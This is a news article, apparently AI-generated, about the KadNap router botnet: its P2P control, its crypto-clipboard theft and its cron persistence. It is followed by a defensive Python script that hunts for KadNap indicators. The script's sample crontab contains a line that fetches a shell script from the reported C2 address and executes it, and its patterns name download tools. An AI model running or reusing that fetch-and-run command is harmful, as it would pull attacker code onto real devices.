

Ethical Hacking News

KadNap Malware: A Stealthy Proxy Botnet Infecting 14,000+ Edge Devices




A new malware known as KadNap has infected over 14,000 edge devices worldwide, primarily targeting Asus routers to enlist them into a botnet for proxying malicious traffic. The malware employs stealth techniques and uses a peer-to-peer system to evade detection. Users are advised to keep their devices up to date and secure management interfaces to prevent potential infections.

  • The KadNap malware has infected over 14,000 edge devices worldwide, primarily targeting Asus routers.
  • The malware uses a custom Kademlia Distributed Hash Table (DHT) protocol to evade traditional network monitoring techniques.
  • The malware can monetize victims by hijacking cryptocurrency wallet addresses copied in X11 sessions and replacing them with attacker-controlled addresses.
  • The KadNap botnet stands out for its use of a peer-to-peer network for decentralized control, making it difficult to detect and protect against.
  • Users running SOHO routers are advised to keep their devices up to date, reboot regularly, change default passwords, secure management interfaces, and replace end-of-life models.



The cybersecurity landscape has been rattled by the emergence of a new malware known as KadNap, which has infected over 14,000 edge devices worldwide. The malicious software, first detected in August 2025, primarily targets Asus routers and is designed to enlist them into a botnet for proxying malicious traffic. This article delves into the details of the KadNap malware, its mechanisms, and the implications it poses to network security.

The KadNap malware employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol to conceal the IP address of its infrastructure within a peer-to-peer system. This approach allows the malware to evade traditional network monitoring techniques, making it challenging for cybersecurity researchers to track its activities. According to Black Lotus Labs, a leading cybersecurity company, "KadNap employs stealth techniques, such as process masquerading and Wayland session avoidance." These techniques enable the malware to maintain low visibility while monitoring the clipboard every 200 milliseconds and substituting cryptocurrency addresses with attacker-controlled wallets.

The malware's avoidance of Wayland sessions is deliberate: the display server protocol's security architecture adds controls, such as requiring explicit user interaction, before an application can read the clipboard. By disabling itself in such sessions, the malware avoids noisy failed attempts and runtime errors. This highlights the KadNap malware's resourcefulness and adaptability in evading detection.

One notable feature of KadNap is its ability to monetize victims directly by hijacking cryptocurrency wallet addresses copied in X11 sessions and replacing them with attacker-controlled addresses. The company behind the malware, Doppelgänger ("doppelganger[.]shop"), claims to offer residential proxies in over 50 countries that provide "100% anonymity." The service is said to have launched in May/June 2025.

The KadNap botnet stands out among botnets that support anonymous proxies in its use of a peer-to-peer network for decentralized control. According to Lumen, the company responsible for analyzing the malware, "their intention is clear, avoid detection and make it difficult for defenders to protect against."

KadNap has been found on an assorted set of edge networking devices beyond Asus routers. Central to the attack is a shell script ("aic.sh") downloaded from the C2 server ("212.104.141[.]140"), which begins conscripting the victim into the P2P network. The script creates a cron job that retrieves the shell script from the server at minute 55 of every hour, renames it to ".asusrouter," and runs it.

Once persistence is established, the script pulls a malicious ELF file, renames it to "kad," and executes it, deploying KadNap. The malware targets devices running both ARM and MIPS processors. It also connects to an NTP server to fetch the current time and stores it along with the host uptime, creating a hash that serves as a basis for locating other peers in the decentralized network.

Two further files, fwr.sh and /tmp/.sose, contain functionality to close port 22 (the standard TCP port for Secure Shell, SSH) on the infected device and to extract a list of C2 IP address:port combinations to connect to. This allows the malware to establish communication channels that are difficult to disrupt.

Further analysis has determined that not all compromised devices communicate with every C2 server, indicating that the infrastructure is segmented by device type and model. The Black Lotus Labs team told The Hacker News that Doppelgänger's bots are being abused by threat actors in the wild. "One issue there has been since these Asus (and other devices) are also sometimes co-infected with other malware, it is tricky to say who exactly is responsible for a specific malicious activity," the company said.

Users running SOHO routers are advised to keep their devices up to date, reboot them regularly, change default passwords, secure management interfaces, and replace models that are end-of-life and no longer supported. The KadNap malware serves as a stark reminder of the importance of maintaining robust network security measures in today's threat landscape.
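The persistence chain described above (a cron job at minute 55 of every hour that fetches a shell script, the ".asusrouter" rename, the dropped "kad" binary, and the reported C2 address) gives a defender a concrete set of indicators to hunt for on a router's crontab and process list. The following Python is an added example, not code from the article or from Black Lotus Labs; the crontab lines and process names it scans are constructed, and the file names and IP address it matches are the ones reported in the article.

```python
"""Hunt for KadNap-style persistence indicators in crontab text and a process
name list. Example code added to this article; sample input is constructed."""
import re
from dataclasses import dataclass

# Indicators taken from the article. The IP is the reported C2 address.
C2_IP = "212.104.141.140"
SUSPICIOUS_NAMES = (".asusrouter", "aic.sh", "fwr.sh", "/tmp/.sose")
SUSPICIOUS_BINARY = "kad"

# Five schedule fields followed by the command.
CRON_RE = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.*)$")
FETCH_RE = re.compile(r"\b(wget|curl|tftp)\b")


@dataclass
class Finding:
    line: str
    reasons: list


def cron_minute_matches(minute_field, wanted=55):
    """True when a crontab minute field includes `wanted`.

    Handles single values, comma lists and ranges. Step expressions ('*/5')
    and '*' are treated as not matching so the check stays specific to the
    hourly minute-55 schedule reported for KadNap."""
    for part in minute_field.split(","):
        if part.isdigit() and int(part) == wanted:
            return True
        lo, sep, hi = part.partition("-")
        if sep and lo.isdigit() and hi.isdigit() and int(lo) <= wanted <= int(hi):
            return True
    return False


def check_cron_line(line):
    """Return the list of reasons a single crontab line looks like KadNap
    persistence (empty list when it looks benign)."""
    reasons = []
    if line.lstrip().startswith("#"):
        return reasons
    m = CRON_RE.match(line)
    if not m:
        return reasons
    minute, hour, _dom, _mon, _dow, command = m.groups()
    if C2_IP in command:
        reasons.append("references reported C2 address")
    if any(name in command for name in SUSPICIOUS_NAMES):
        reasons.append("references KadNap file name")
    if hour == "*" and cron_minute_matches(minute) and FETCH_RE.search(command):
        reasons.append("hourly remote fetch at minute 55")
    return reasons


def check_process_name(name):
    """Flag a bare process name equal to the dropped binary's name."""
    if name.strip() == SUSPICIOUS_BINARY:
        return ["process named like KadNap binary"]
    return []


def scan(crontab_text, process_names):
    """Run both checks and collect findings in input order."""
    findings = []
    for line in crontab_text.splitlines():
        reasons = check_cron_line(line)
        if reasons:
            findings.append(Finding(line.strip(), reasons))
    for name in process_names:
        reasons = check_process_name(name)
        if reasons:
            findings.append(Finding(name.strip(), reasons))
    return findings


# Constructed sample: one benign job and one mimicking the reported persistence.
SAMPLE_CRONTAB = """\
# constructed sample crontab
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
55 * * * * wget -q http://212.104.141.140/aic.sh -O /tmp/.asusrouter && sh /tmp/.asusrouter
"""
SAMPLE_PROCS = ["init", "httpd", "kad", "dnsmasq"]

if __name__ == "__main__":
    for f in scan(SAMPLE_CRONTAB, SAMPLE_PROCS):
        print(f.line, "->", "; ".join(f.reasons))
```

On a real device the crontab text would come from `crontab -l` or the cron spool and the process names from `ps`; the three cron checks are independent so a job that only matches the schedule still surfaces for review even if the operator has rotated the C2 address or file names.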



    Related Information:
  • https://www.ethicalhackingnews.com/articles/KadNap-Malware-A-Stealthy-Proxy-Botnet-Infecting-14000-Edge-Devices-ehn.shtml

  • Published: Tue Mar 10 14:16:56 2026 by llama3.2 3B Q4_K_M













    © Ethical Hacking News. All rights reserved.